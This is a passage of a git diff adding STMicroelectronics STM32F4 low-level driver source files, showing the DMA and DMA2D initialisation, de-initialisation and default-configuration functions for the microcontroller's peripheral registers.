IS_LL_DMA_FIFO_MODE_STATE(STATE) (((STATE) == LL_DMA_FIFOMODE_DISABLE ) || \ + ((STATE) == LL_DMA_FIFOMODE_ENABLE)) + +#define IS_LL_DMA_FIFO_THRESHOLD(THRESHOLD) (((THRESHOLD) == LL_DMA_FIFOTHRESHOLD_1_4) || \ + ((THRESHOLD) == LL_DMA_FIFOTHRESHOLD_1_2) || \ + ((THRESHOLD) == LL_DMA_FIFOTHRESHOLD_3_4) || \ + ((THRESHOLD) == LL_DMA_FIFOTHRESHOLD_FULL)) + +#define IS_LL_DMA_MEMORY_BURST(BURST) (((BURST) == LL_DMA_MBURST_SINGLE) || \ + ((BURST) == LL_DMA_MBURST_INC4) || \ + ((BURST) == LL_DMA_MBURST_INC8) || \ + ((BURST) == LL_DMA_MBURST_INC16)) + +#define IS_LL_DMA_PERIPHERAL_BURST(BURST) (((BURST) == LL_DMA_PBURST_SINGLE) || \ + ((BURST) == LL_DMA_PBURST_INC4) || \ + ((BURST) == LL_DMA_PBURST_INC8) || \ + ((BURST) == LL_DMA_PBURST_INC16)) + +/** + * @} + */ + +/* Private function prototypes -----------------------------------------------*/ + +/* Exported functions --------------------------------------------------------*/ +/** @addtogroup DMA_LL_Exported_Functions + * @{ + */ + +/** @addtogroup DMA_LL_EF_Init + * @{ + */ + +/** + * @brief De-initialize the DMA registers to their default reset values. + * @param DMAx DMAx Instance + * @param Stream This parameter can be one of the following values: + * @arg @ref LL_DMA_STREAM_0 + * @arg @ref LL_DMA_STREAM_1 + * @arg @ref LL_DMA_STREAM_2 + * @arg @ref LL_DMA_STREAM_3 + * @arg @ref LL_DMA_STREAM_4 + * @arg @ref LL_DMA_STREAM_5 + * @arg @ref LL_DMA_STREAM_6 + * @arg @ref LL_DMA_STREAM_7 + * @arg @ref LL_DMA_STREAM_ALL + * @retval An ErrorStatus enumeration value: + * - SUCCESS: DMA registers are de-initialized + * - ERROR: DMA registers are not de-initialized + */ +uint32_t LL_DMA_DeInit(DMA_TypeDef *DMAx, uint32_t Stream) +{ + DMA_Stream_TypeDef *tmp = (DMA_Stream_TypeDef *)DMA1_Stream0; + ErrorStatus status = SUCCESS; + + /* Check the DMA Instance DMAx and Stream parameters*/ + assert_param(IS_LL_DMA_ALL_STREAM_INSTANCE(DMAx, Stream)); + + if (Stream == LL_DMA_STREAM_ALL) + { + if (DMAx == DMA1) + { + /* Force reset of DMA clock */ + LL_AHB1_GRP1_ForceReset(LL_AHB1_GRP1_PERIPH_DMA1); + + /* Release reset of DMA clock */ + LL_AHB1_GRP1_ReleaseReset(LL_AHB1_GRP1_PERIPH_DMA1); + } + else if (DMAx == DMA2) + { + /* Force reset of DMA clock */ + LL_AHB1_GRP1_ForceReset(LL_AHB1_GRP1_PERIPH_DMA2); + + /* Release reset of DMA clock */ + LL_AHB1_GRP1_ReleaseReset(LL_AHB1_GRP1_PERIPH_DMA2); + } + else + { + status = ERROR; + } + } + else + { + /* Disable the selected Stream */ + LL_DMA_DisableStream(DMAx,Stream); + + /* Get the DMA Stream Instance */ + tmp = (DMA_Stream_TypeDef *)(__LL_DMA_GET_STREAM_INSTANCE(DMAx, Stream)); + + /* Reset DMAx_Streamy configuration register */ + LL_DMA_WriteReg(tmp, CR, 0U); + + /* Reset DMAx_Streamy remaining bytes register */ + LL_DMA_WriteReg(tmp, NDTR, 0U); + + /* Reset DMAx_Streamy peripheral address register */ + LL_DMA_WriteReg(tmp, PAR, 0U); + + /* Reset DMAx_Streamy memory address register */ + LL_DMA_WriteReg(tmp, M0AR, 0U); + + /* Reset DMAx_Streamy memory address register */ + LL_DMA_WriteReg(tmp, M1AR, 0U); + + /* Reset DMAx_Streamy FIFO control register */ + LL_DMA_WriteReg(tmp, FCR, 0x00000021U); + + /* Reset Channel register field for DMAx Stream*/ + LL_DMA_SetChannelSelection(DMAx, Stream, LL_DMA_CHANNEL_0); + + if(Stream == LL_DMA_STREAM_0) + { + /* Reset the Stream0 pending flags */ + DMAx->LIFCR = 0x0000003FU; + } + else if(Stream == LL_DMA_STREAM_1) + { + /* Reset the Stream1 pending flags */ + DMAx->LIFCR = 0x00000F40U; + } + else if(Stream == LL_DMA_STREAM_2) + { + /* Reset the Stream2 pending flags */ + DMAx->LIFCR = 0x003F0000U; + } + else if(Stream == LL_DMA_STREAM_3) + { + /* Reset the Stream3 pending flags */ + DMAx->LIFCR = 0x0F400000U; + } + else if(Stream == LL_DMA_STREAM_4) + { + /* Reset the Stream4 pending flags */ + DMAx->HIFCR = 0x0000003FU; + } + else if(Stream == LL_DMA_STREAM_5) + { + /* Reset the Stream5 pending flags */ + DMAx->HIFCR = 0x00000F40U; + } + else if(Stream == LL_DMA_STREAM_6) + { + /* Reset the Stream6 pending flags */ + DMAx->HIFCR = 0x003F0000U; + } + else if(Stream == LL_DMA_STREAM_7) + { + /* Reset the Stream7 pending flags */ + DMAx->HIFCR = 0x0F400000U; + } + else + { + status = ERROR; + } + } + + return status; +} + +/** + * @brief Initialize the DMA registers according to the specified parameters in DMA_InitStruct. + * @note To convert DMAx_Streamy Instance to DMAx Instance and Streamy, use helper macros : + * @arg @ref __LL_DMA_GET_INSTANCE + * @arg @ref __LL_DMA_GET_STREAM + * @param DMAx DMAx Instance + * @param Stream This parameter can be one of the following values: + * @arg @ref LL_DMA_STREAM_0 + * @arg @ref LL_DMA_STREAM_1 + * @arg @ref LL_DMA_STREAM_2 + * @arg @ref LL_DMA_STREAM_3 + * @arg @ref LL_DMA_STREAM_4 + * @arg @ref LL_DMA_STREAM_5 + * @arg @ref LL_DMA_STREAM_6 + * @arg @ref LL_DMA_STREAM_7 + * @param DMA_InitStruct pointer to a @ref LL_DMA_InitTypeDef structure. + * @retval An ErrorStatus enumeration value: + * - SUCCESS: DMA registers are initialized + * - ERROR: Not applicable + */ +uint32_t LL_DMA_Init(DMA_TypeDef *DMAx, uint32_t Stream, LL_DMA_InitTypeDef *DMA_InitStruct) +{ + /* Check the DMA Instance DMAx and Stream parameters*/ + assert_param(IS_LL_DMA_ALL_STREAM_INSTANCE(DMAx, Stream)); + + /* Check the DMA parameters from DMA_InitStruct */ + assert_param(IS_LL_DMA_DIRECTION(DMA_InitStruct->Direction)); + assert_param(IS_LL_DMA_MODE(DMA_InitStruct->Mode)); + assert_param(IS_LL_DMA_PERIPHINCMODE(DMA_InitStruct->PeriphOrM2MSrcIncMode)); + assert_param(IS_LL_DMA_MEMORYINCMODE(DMA_InitStruct->MemoryOrM2MDstIncMode)); + assert_param(IS_LL_DMA_PERIPHDATASIZE(DMA_InitStruct->PeriphOrM2MSrcDataSize)); + assert_param(IS_LL_DMA_MEMORYDATASIZE(DMA_InitStruct->MemoryOrM2MDstDataSize)); + assert_param(IS_LL_DMA_NBDATA(DMA_InitStruct->NbData)); + assert_param(IS_LL_DMA_CHANNEL(DMA_InitStruct->Channel)); + assert_param(IS_LL_DMA_PRIORITY(DMA_InitStruct->Priority)); + assert_param(IS_LL_DMA_FIFO_MODE_STATE(DMA_InitStruct->FIFOMode)); + /* Check the memory burst, peripheral burst and FIFO threshold parameters only + when FIFO mode is enabled */ + if(DMA_InitStruct->FIFOMode != LL_DMA_FIFOMODE_DISABLE) + { + assert_param(IS_LL_DMA_FIFO_THRESHOLD(DMA_InitStruct->FIFOThreshold)); + assert_param(IS_LL_DMA_MEMORY_BURST(DMA_InitStruct->MemBurst)); + assert_param(IS_LL_DMA_PERIPHERAL_BURST(DMA_InitStruct->PeriphBurst)); + } + + /*---------------------------- DMAx SxCR Configuration ------------------------ + * Configure DMAx_Streamy: data transfer direction, data transfer mode, + * peripheral and memory increment mode, + * data size alignment and priority level with parameters : + * - Direction: DMA_SxCR_DIR[1:0] bits + * - Mode: DMA_SxCR_CIRC bit + * - PeriphOrM2MSrcIncMode: DMA_SxCR_PINC bit + * - MemoryOrM2MDstIncMode: DMA_SxCR_MINC bit + * - PeriphOrM2MSrcDataSize: DMA_SxCR_PSIZE[1:0] bits + * - MemoryOrM2MDstDataSize: DMA_SxCR_MSIZE[1:0] bits + * - Priority: DMA_SxCR_PL[1:0] bits + */ + LL_DMA_ConfigTransfer(DMAx, Stream, DMA_InitStruct->Direction | \ + DMA_InitStruct->Mode | \ + DMA_InitStruct->PeriphOrM2MSrcIncMode | \ + DMA_InitStruct->MemoryOrM2MDstIncMode | \ + DMA_InitStruct->PeriphOrM2MSrcDataSize | \ + DMA_InitStruct->MemoryOrM2MDstDataSize | \ + DMA_InitStruct->Priority + ); + + if(DMA_InitStruct->FIFOMode != LL_DMA_FIFOMODE_DISABLE) + { + /*---------------------------- DMAx SxFCR Configuration ------------------------ + * Configure DMAx_Streamy: fifo mode and fifo threshold with parameters : + * - FIFOMode: DMA_SxFCR_DMDIS bit + * - FIFOThreshold: DMA_SxFCR_FTH[1:0] bits + */ + LL_DMA_ConfigFifo(DMAx, Stream, DMA_InitStruct->FIFOMode, DMA_InitStruct->FIFOThreshold); + + /*---------------------------- DMAx SxCR Configuration -------------------------- + * Configure DMAx_Streamy: memory burst transfer with parameters : + * - MemBurst: DMA_SxCR_MBURST[1:0] bits + */ + LL_DMA_SetMemoryBurstxfer(DMAx,Stream,DMA_InitStruct->MemBurst); + + /*---------------------------- DMAx SxCR Configuration -------------------------- + * Configure DMAx_Streamy: peripheral burst transfer with parameters : + * - PeriphBurst: DMA_SxCR_PBURST[1:0] bits + */ + LL_DMA_SetPeriphBurstxfer(DMAx,Stream,DMA_InitStruct->PeriphBurst); + } + + /*-------------------------- DMAx SxM0AR Configuration -------------------------- + * Configure the memory or destination base address with parameter : + * - MemoryOrM2MDstAddress: DMA_SxM0AR_M0A[31:0] bits + */ + LL_DMA_SetMemoryAddress(DMAx, Stream, DMA_InitStruct->MemoryOrM2MDstAddress); + + /*-------------------------- DMAx SxPAR Configuration --------------------------- + * Configure the peripheral or source base address with parameter : + * - PeriphOrM2MSrcAddress: DMA_SxPAR_PA[31:0] bits + */ + LL_DMA_SetPeriphAddress(DMAx, Stream, DMA_InitStruct->PeriphOrM2MSrcAddress); + + /*--------------------------- DMAx SxNDTR Configuration ------------------------- + * Configure the peripheral base address with parameter : + * - NbData: DMA_SxNDT[15:0] bits + */ + LL_DMA_SetDataLength(DMAx, Stream, DMA_InitStruct->NbData); + + /*--------------------------- DMA SxCR_CHSEL Configuration ---------------------- + * Configure the peripheral base address with parameter : + * - PeriphRequest: DMA_SxCR_CHSEL[2:0] bits + */ + LL_DMA_SetChannelSelection(DMAx, Stream, DMA_InitStruct->Channel); + + return SUCCESS; +} + +/** + * @brief Set each @ref LL_DMA_InitTypeDef field to default value. + * @param DMA_InitStruct Pointer to a @ref LL_DMA_InitTypeDef structure. + * @retval None + */ +void LL_DMA_StructInit(LL_DMA_InitTypeDef *DMA_InitStruct) +{ + /* Set DMA_InitStruct fields to default values */ + DMA_InitStruct->PeriphOrM2MSrcAddress = 0x00000000U; + DMA_InitStruct->MemoryOrM2MDstAddress = 0x00000000U; + DMA_InitStruct->Direction = LL_DMA_DIRECTION_PERIPH_TO_MEMORY; + DMA_InitStruct->Mode = LL_DMA_MODE_NORMAL; + DMA_InitStruct->PeriphOrM2MSrcIncMode = LL_DMA_PERIPH_NOINCREMENT; + DMA_InitStruct->MemoryOrM2MDstIncMode = LL_DMA_MEMORY_NOINCREMENT; + DMA_InitStruct->PeriphOrM2MSrcDataSize = LL_DMA_PDATAALIGN_BYTE; + DMA_InitStruct->MemoryOrM2MDstDataSize = LL_DMA_MDATAALIGN_BYTE; + DMA_InitStruct->NbData = 0x00000000U; + DMA_InitStruct->Channel = LL_DMA_CHANNEL_0; + DMA_InitStruct->Priority = LL_DMA_PRIORITY_LOW; + DMA_InitStruct->FIFOMode = LL_DMA_FIFOMODE_DISABLE; + DMA_InitStruct->FIFOThreshold = LL_DMA_FIFOTHRESHOLD_1_4; + DMA_InitStruct->MemBurst = LL_DMA_MBURST_SINGLE; + DMA_InitStruct->PeriphBurst = LL_DMA_PBURST_SINGLE; +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +#endif /* DMA1 || DMA2 */ + +/** + * @} + */ + +#endif /* USE_FULL_LL_DRIVER */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_dma2d.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_dma2d.c new file mode 100644 index 000000000..92941c4fb --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_dma2d.c @@ -0,0 +1,598 @@ +/** + ****************************************************************************** + * @file stm32f4xx_ll_dma2d.c + * @author MCD Application Team + * @brief DMA2D LL module driver. + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ +#if defined(USE_FULL_LL_DRIVER) + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_ll_dma2d.h" +#include "stm32f4xx_ll_bus.h" +#ifdef USE_FULL_ASSERT +#include "stm32_assert.h" +#else +#define assert_param(expr) ((void)0U) +#endif /* USE_FULL_ASSERT */ + +/** @addtogroup STM32F4xx_LL_Driver + * @{ + */ + +#if defined (DMA2D) + +/** @addtogroup DMA2D_LL + * @{ + */ + +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/** @addtogroup DMA2D_LL_Private_Constants DMA2D Private Constants + * @{ + */ +#define LL_DMA2D_COLOR 0xFFU /*!< Maximum output color setting */ +#define LL_DMA2D_NUMBEROFLINES DMA2D_NLR_NL /*!< Maximum number of lines */ +#define LL_DMA2D_NUMBEROFPIXELS (DMA2D_NLR_PL >> DMA2D_NLR_PL_Pos) /*!< Maximum number of pixels per lines */ +#define LL_DMA2D_OFFSET_MAX 0x3FFFU /*!< Maximum output line offset expressed in pixels */ +#define LL_DMA2D_CLUTSIZE_MAX 0xFFU /*!< Maximum CLUT size */ +/** + * @} + */ +/* Private macros ------------------------------------------------------------*/ +/** @addtogroup DMA2D_LL_Private_Macros + * @{ + */ +#define IS_LL_DMA2D_MODE(MODE) (((MODE) == LL_DMA2D_MODE_M2M) || \ + ((MODE) == LL_DMA2D_MODE_M2M_PFC) || \ + ((MODE) == LL_DMA2D_MODE_M2M_BLEND) || \ + ((MODE) == LL_DMA2D_MODE_R2M)) + +#define IS_LL_DMA2D_OCMODE(MODE_ARGB) (((MODE_ARGB) == LL_DMA2D_OUTPUT_MODE_ARGB8888) || \ + ((MODE_ARGB) == LL_DMA2D_OUTPUT_MODE_RGB888) || \ + ((MODE_ARGB) == LL_DMA2D_OUTPUT_MODE_RGB565) || \ + ((MODE_ARGB) == LL_DMA2D_OUTPUT_MODE_ARGB1555) || \ + ((MODE_ARGB) == LL_DMA2D_OUTPUT_MODE_ARGB4444)) + +#define IS_LL_DMA2D_GREEN(GREEN) ((GREEN) <= LL_DMA2D_COLOR) +#define IS_LL_DMA2D_RED(RED) ((RED) <= LL_DMA2D_COLOR) +#define IS_LL_DMA2D_BLUE(BLUE) ((BLUE) <= LL_DMA2D_COLOR) +#define IS_LL_DMA2D_ALPHA(ALPHA) ((ALPHA) <= LL_DMA2D_COLOR) + + +#define IS_LL_DMA2D_OFFSET(OFFSET) ((OFFSET) <= LL_DMA2D_OFFSET_MAX) + +#define IS_LL_DMA2D_LINE(LINES) ((LINES) <= LL_DMA2D_NUMBEROFLINES) +#define IS_LL_DMA2D_PIXEL(PIXELS) ((PIXELS) <= LL_DMA2D_NUMBEROFPIXELS) + + + +#define IS_LL_DMA2D_LCMODE(MODE_ARGB) (((MODE_ARGB) == LL_DMA2D_INPUT_MODE_ARGB8888) || \ + ((MODE_ARGB) == LL_DMA2D_INPUT_MODE_RGB888) || \ + ((MODE_ARGB) == LL_DMA2D_INPUT_MODE_RGB565) || \ + ((MODE_ARGB) == LL_DMA2D_INPUT_MODE_ARGB1555) || \ + ((MODE_ARGB) == LL_DMA2D_INPUT_MODE_ARGB4444) || \ + ((MODE_ARGB) == LL_DMA2D_INPUT_MODE_L8) || \ + ((MODE_ARGB) == LL_DMA2D_INPUT_MODE_AL44) || \ + ((MODE_ARGB) == LL_DMA2D_INPUT_MODE_AL88) || \ + ((MODE_ARGB) == LL_DMA2D_INPUT_MODE_L4) || \ + ((MODE_ARGB) == LL_DMA2D_INPUT_MODE_A8) || \ + ((MODE_ARGB) == LL_DMA2D_INPUT_MODE_A4)) + +#define IS_LL_DMA2D_CLUTCMODE(CLUTCMODE) (((CLUTCMODE) == LL_DMA2D_CLUT_COLOR_MODE_ARGB8888) || \ + ((CLUTCMODE) == LL_DMA2D_CLUT_COLOR_MODE_RGB888)) + +#define IS_LL_DMA2D_CLUTSIZE(SIZE) ((SIZE) <= LL_DMA2D_CLUTSIZE_MAX) + +#define IS_LL_DMA2D_ALPHAMODE(MODE) (((MODE) == LL_DMA2D_ALPHA_MODE_NO_MODIF) || \ + ((MODE) == LL_DMA2D_ALPHA_MODE_REPLACE) || \ + ((MODE) == LL_DMA2D_ALPHA_MODE_COMBINE)) + + +/** + * @} + */ + +/* Private function prototypes -----------------------------------------------*/ + +/* Exported functions --------------------------------------------------------*/ +/** @addtogroup DMA2D_LL_Exported_Functions + * @{ + */ + +/** @addtogroup DMA2D_LL_EF_Init_Functions Initialization and De-initialization Functions + * @{ + */ + +/** + * @brief De-initialize DMA2D registers (registers restored to their default values). + * @param DMA2Dx DMA2D Instance + * @retval An ErrorStatus enumeration value: + * - SUCCESS: DMA2D registers are de-initialized + * - ERROR: DMA2D registers are not de-initialized + */ +ErrorStatus LL_DMA2D_DeInit(DMA2D_TypeDef *DMA2Dx) +{ + ErrorStatus status = SUCCESS; + + /* Check the parameters */ + assert_param(IS_DMA2D_ALL_INSTANCE(DMA2Dx)); + + if (DMA2Dx == DMA2D) + { + /* Force reset of DMA2D clock */ + LL_AHB1_GRP1_ForceReset(LL_AHB1_GRP1_PERIPH_DMA2D); + + /* Release reset of DMA2D clock */ + LL_AHB1_GRP1_ReleaseReset(LL_AHB1_GRP1_PERIPH_DMA2D); + } + else + { + status = ERROR; + } + + return (status); +} + +/** + * @brief Initialize DMA2D registers according to the specified parameters in DMA2D_InitStruct. + * @note DMA2D transfers must be disabled to set initialization bits in configuration registers, + * otherwise ERROR result is returned. + * @param DMA2Dx DMA2D Instance + * @param DMA2D_InitStruct pointer to a LL_DMA2D_InitTypeDef structure + * that contains the configuration information for the specified DMA2D peripheral. + * @retval An ErrorStatus enumeration value: + * - SUCCESS: DMA2D registers are initialized according to DMA2D_InitStruct content + * - ERROR: Issue occurred during DMA2D registers initialization + */ +ErrorStatus LL_DMA2D_Init(DMA2D_TypeDef *DMA2Dx, LL_DMA2D_InitTypeDef *DMA2D_InitStruct) +{ + ErrorStatus status = ERROR; + LL_DMA2D_ColorTypeDef dma2d_colorstruct; + uint32_t tmp; + uint32_t tmp1; + uint32_t tmp2; + uint32_t regMask; + uint32_t regValue; + + /* Check the parameters */ + assert_param(IS_DMA2D_ALL_INSTANCE(DMA2Dx)); + assert_param(IS_LL_DMA2D_MODE(DMA2D_InitStruct->Mode)); + assert_param(IS_LL_DMA2D_OCMODE(DMA2D_InitStruct->ColorMode)); + assert_param(IS_LL_DMA2D_LINE(DMA2D_InitStruct->NbrOfLines)); + assert_param(IS_LL_DMA2D_PIXEL(DMA2D_InitStruct->NbrOfPixelsPerLines)); + assert_param(IS_LL_DMA2D_GREEN(DMA2D_InitStruct->OutputGreen)); + assert_param(IS_LL_DMA2D_RED(DMA2D_InitStruct->OutputRed)); + assert_param(IS_LL_DMA2D_BLUE(DMA2D_InitStruct->OutputBlue)); + assert_param(IS_LL_DMA2D_ALPHA(DMA2D_InitStruct->OutputAlpha)); + assert_param(IS_LL_DMA2D_OFFSET(DMA2D_InitStruct->LineOffset)); + + /* DMA2D transfers must be disabled to configure bits in initialization registers */ + tmp = LL_DMA2D_IsTransferOngoing(DMA2Dx); + tmp1 = LL_DMA2D_FGND_IsEnabledCLUTLoad(DMA2Dx); + tmp2 = LL_DMA2D_BGND_IsEnabledCLUTLoad(DMA2Dx); + if ((tmp == 0U) && (tmp1 == 0U) && (tmp2 == 0U)) + { + /* DMA2D CR register configuration -------------------------------------------*/ + LL_DMA2D_SetMode(DMA2Dx, DMA2D_InitStruct->Mode); + + /* DMA2D OPFCCR register configuration ---------------------------------------*/ + regMask = DMA2D_OPFCCR_CM; + regValue = DMA2D_InitStruct->ColorMode; + + + + + MODIFY_REG(DMA2Dx->OPFCCR, regMask, regValue); + + /* DMA2D OOR register configuration ------------------------------------------*/ + LL_DMA2D_SetLineOffset(DMA2Dx, DMA2D_InitStruct->LineOffset); + + /* DMA2D NLR register configuration ------------------------------------------*/ + LL_DMA2D_ConfigSize(DMA2Dx, DMA2D_InitStruct->NbrOfLines, DMA2D_InitStruct->NbrOfPixelsPerLines); + + /* DMA2D OMAR register configuration ------------------------------------------*/ + LL_DMA2D_SetOutputMemAddr(DMA2Dx, DMA2D_InitStruct->OutputMemoryAddress); + + /* DMA2D OCOLR register configuration ------------------------------------------*/ + dma2d_colorstruct.ColorMode = DMA2D_InitStruct->ColorMode; + dma2d_colorstruct.OutputBlue = DMA2D_InitStruct->OutputBlue; + dma2d_colorstruct.OutputGreen = DMA2D_InitStruct->OutputGreen; + dma2d_colorstruct.OutputRed = DMA2D_InitStruct->OutputRed; + dma2d_colorstruct.OutputAlpha = DMA2D_InitStruct->OutputAlpha; + LL_DMA2D_ConfigOutputColor(DMA2Dx, &dma2d_colorstruct); + + status = SUCCESS; + } + /* If DMA2D transfers are not disabled, return ERROR */ + + return (status); +} + +/** + * @brief Set each @ref LL_DMA2D_InitTypeDef field to default value. + * @param DMA2D_InitStruct pointer to a @ref LL_DMA2D_InitTypeDef structure + * whose fields will be set to default values. + * @retval None + */ +void LL_DMA2D_StructInit(LL_DMA2D_InitTypeDef *DMA2D_InitStruct) +{ + /* Set DMA2D_InitStruct fields to default values */ + DMA2D_InitStruct->Mode = LL_DMA2D_MODE_M2M; + DMA2D_InitStruct->ColorMode = LL_DMA2D_OUTPUT_MODE_ARGB8888; + DMA2D_InitStruct->NbrOfLines = 0x0U; + DMA2D_InitStruct->NbrOfPixelsPerLines = 0x0U; + DMA2D_InitStruct->LineOffset = 0x0U; + DMA2D_InitStruct->OutputBlue = 0x0U; + DMA2D_InitStruct->OutputGreen = 0x0U; + DMA2D_InitStruct->OutputRed = 0x0U; + DMA2D_InitStruct->OutputAlpha = 0x0U; + DMA2D_InitStruct->OutputMemoryAddress = 0x0U; +} + +/** + * @brief Configure the foreground or background according to the specified parameters + * in the LL_DMA2D_LayerCfgTypeDef structure. + * @param DMA2Dx DMA2D Instance + * @param DMA2D_LayerCfg pointer to a LL_DMA2D_LayerCfgTypeDef structure that contains + * the configuration information for the specified layer. + * @param LayerIdx DMA2D Layer index. + * This parameter can be one of the following values: + * 0(background) / 1(foreground) + * @retval None + */ +void LL_DMA2D_ConfigLayer(DMA2D_TypeDef *DMA2Dx, LL_DMA2D_LayerCfgTypeDef *DMA2D_LayerCfg, uint32_t LayerIdx) +{ + /* Check the parameters */ + assert_param(IS_LL_DMA2D_OFFSET(DMA2D_LayerCfg->LineOffset)); + assert_param(IS_LL_DMA2D_LCMODE(DMA2D_LayerCfg->ColorMode)); + assert_param(IS_LL_DMA2D_CLUTCMODE(DMA2D_LayerCfg->CLUTColorMode)); + assert_param(IS_LL_DMA2D_CLUTSIZE(DMA2D_LayerCfg->CLUTSize)); + assert_param(IS_LL_DMA2D_ALPHAMODE(DMA2D_LayerCfg->AlphaMode)); + assert_param(IS_LL_DMA2D_GREEN(DMA2D_LayerCfg->Green)); + assert_param(IS_LL_DMA2D_RED(DMA2D_LayerCfg->Red)); + assert_param(IS_LL_DMA2D_BLUE(DMA2D_LayerCfg->Blue)); + assert_param(IS_LL_DMA2D_ALPHA(DMA2D_LayerCfg->Alpha)); + + + if (LayerIdx == 0U) + { + /* Configure the background memory address */ + LL_DMA2D_BGND_SetMemAddr(DMA2Dx, DMA2D_LayerCfg->MemoryAddress); + + /* Configure the background line offset */ + LL_DMA2D_BGND_SetLineOffset(DMA2Dx, DMA2D_LayerCfg->LineOffset); + + /* Configure the background Alpha value, Alpha mode, CLUT size, CLUT Color mode and Color mode */ + MODIFY_REG(DMA2Dx->BGPFCCR, \ + (DMA2D_BGPFCCR_ALPHA | DMA2D_BGPFCCR_AM | DMA2D_BGPFCCR_CS | DMA2D_BGPFCCR_CCM | DMA2D_BGPFCCR_CM), \ + ((DMA2D_LayerCfg->Alpha << DMA2D_BGPFCCR_ALPHA_Pos) | DMA2D_LayerCfg->AlphaMode | \ + (DMA2D_LayerCfg->CLUTSize << DMA2D_BGPFCCR_CS_Pos) | DMA2D_LayerCfg->CLUTColorMode | \ + DMA2D_LayerCfg->ColorMode)); + + /* Configure the background color */ + LL_DMA2D_BGND_SetColor(DMA2Dx, DMA2D_LayerCfg->Red, DMA2D_LayerCfg->Green, DMA2D_LayerCfg->Blue); + + /* Configure the background CLUT memory address */ + LL_DMA2D_BGND_SetCLUTMemAddr(DMA2Dx, DMA2D_LayerCfg->CLUTMemoryAddress); + } + else + { + /* Configure the foreground memory address */ + LL_DMA2D_FGND_SetMemAddr(DMA2Dx, DMA2D_LayerCfg->MemoryAddress); + + /* Configure the foreground line offset */ + LL_DMA2D_FGND_SetLineOffset(DMA2Dx, DMA2D_LayerCfg->LineOffset); + + /* Configure the foreground Alpha value, Alpha mode, CLUT size, CLUT Color mode and Color mode */ + MODIFY_REG(DMA2Dx->FGPFCCR, \ + (DMA2D_FGPFCCR_ALPHA | DMA2D_FGPFCCR_AM | DMA2D_FGPFCCR_CS | DMA2D_FGPFCCR_CCM | DMA2D_FGPFCCR_CM), \ + ((DMA2D_LayerCfg->Alpha << DMA2D_FGPFCCR_ALPHA_Pos) | DMA2D_LayerCfg->AlphaMode | \ + (DMA2D_LayerCfg->CLUTSize << DMA2D_FGPFCCR_CS_Pos) | DMA2D_LayerCfg->CLUTColorMode | \ + DMA2D_LayerCfg->ColorMode)); + + /* Configure the foreground color */ + LL_DMA2D_FGND_SetColor(DMA2Dx, DMA2D_LayerCfg->Red, DMA2D_LayerCfg->Green, DMA2D_LayerCfg->Blue); + + /* Configure the foreground CLUT memory address */ + LL_DMA2D_FGND_SetCLUTMemAddr(DMA2Dx, DMA2D_LayerCfg->CLUTMemoryAddress); + } +} + +/** + * @brief Set each @ref LL_DMA2D_LayerCfgTypeDef field to default value. + * @param DMA2D_LayerCfg pointer to a @ref LL_DMA2D_LayerCfgTypeDef structure + * whose fields will be set to default values. + * @retval None + */ +void LL_DMA2D_LayerCfgStructInit(LL_DMA2D_LayerCfgTypeDef *DMA2D_LayerCfg) +{ + /* Set DMA2D_LayerCfg fields to default values */ + DMA2D_LayerCfg->MemoryAddress = 0x0U; + DMA2D_LayerCfg->ColorMode = LL_DMA2D_INPUT_MODE_ARGB8888; + DMA2D_LayerCfg->LineOffset = 0x0U; + DMA2D_LayerCfg->CLUTColorMode = LL_DMA2D_CLUT_COLOR_MODE_ARGB8888; + DMA2D_LayerCfg->CLUTSize = 0x0U; + DMA2D_LayerCfg->AlphaMode = LL_DMA2D_ALPHA_MODE_NO_MODIF; + DMA2D_LayerCfg->Alpha = 0x0U; + DMA2D_LayerCfg->Blue = 0x0U; + DMA2D_LayerCfg->Green = 0x0U; + DMA2D_LayerCfg->Red = 0x0U; + DMA2D_LayerCfg->CLUTMemoryAddress = 0x0U; +} + +/** + * @brief Initialize DMA2D output color register according to the specified parameters + * in DMA2D_ColorStruct. + * @param DMA2Dx DMA2D Instance + * @param DMA2D_ColorStruct pointer to a LL_DMA2D_ColorTypeDef structure that contains + * the color configuration information for the specified DMA2D peripheral. + * @retval None + */ +void LL_DMA2D_ConfigOutputColor(DMA2D_TypeDef *DMA2Dx, LL_DMA2D_ColorTypeDef *DMA2D_ColorStruct) +{ + uint32_t outgreen; + uint32_t outred; + uint32_t outalpha; + + /* Check the parameters */ + assert_param(IS_DMA2D_ALL_INSTANCE(DMA2Dx)); + assert_param(IS_LL_DMA2D_OCMODE(DMA2D_ColorStruct->ColorMode)); + assert_param(IS_LL_DMA2D_GREEN(DMA2D_ColorStruct->OutputGreen)); + assert_param(IS_LL_DMA2D_RED(DMA2D_ColorStruct->OutputRed)); + assert_param(IS_LL_DMA2D_BLUE(DMA2D_ColorStruct->OutputBlue)); + assert_param(IS_LL_DMA2D_ALPHA(DMA2D_ColorStruct->OutputAlpha)); + + /* DMA2D OCOLR register configuration ------------------------------------------*/ + if (DMA2D_ColorStruct->ColorMode == LL_DMA2D_OUTPUT_MODE_ARGB8888) + { + outgreen = DMA2D_ColorStruct->OutputGreen << 8U; + outred = DMA2D_ColorStruct->OutputRed << 16U; + outalpha = DMA2D_ColorStruct->OutputAlpha << 24U; + } + else if (DMA2D_ColorStruct->ColorMode == LL_DMA2D_OUTPUT_MODE_RGB888) + { + outgreen = DMA2D_ColorStruct->OutputGreen << 8U; + outred = DMA2D_ColorStruct->OutputRed << 16U; + outalpha = 0x00000000U; + } + else if (DMA2D_ColorStruct->ColorMode == LL_DMA2D_OUTPUT_MODE_RGB565) + { + outgreen = DMA2D_ColorStruct->OutputGreen << 5U; + outred = DMA2D_ColorStruct->OutputRed << 11U; + outalpha = 0x00000000U; + } + else if (DMA2D_ColorStruct->ColorMode == LL_DMA2D_OUTPUT_MODE_ARGB1555) + { + outgreen = 